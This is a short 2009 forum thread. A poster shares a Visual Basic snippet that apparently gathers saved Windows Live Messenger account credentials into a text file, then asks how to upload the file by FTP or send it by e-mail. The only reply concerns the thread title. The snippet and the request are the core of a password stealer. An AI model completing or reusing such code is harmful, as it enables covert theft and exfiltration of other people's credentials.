|
-
Feb 28th, 2009, 09:18 PM
#1
Thread Starter
New Member
Read this please help.
can anybody tell me how to
get this to upload the txt file to a ftp server
or sending it by e-mail
Option Explicit
Public Sub Main()
Dim sPath As String
Dim sRet As String
sPath = IIf(Right$(App.Path, 1) = "\", App.Path, App.Path & "\")
sRet = mMessengerPass.EnumWLMAccounts
If LenB(sRet) Then
Open sPath & "WLMP.txt" For Append As #1
Print #1, sRet
Close #1
End If
End Sub
-
Feb 28th, 2009, 09:39 PM
#2
Re: Read this please help.

Next time you create a thread please use a more informative Subject. In this case something like How do I upload a txt file to an ftp server?.
-
Mar 1st, 2009, 08:15 AM
#3
Thread Starter
New Member
Re: Read this please help.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
Click Here to Expand Forum to Full Width
|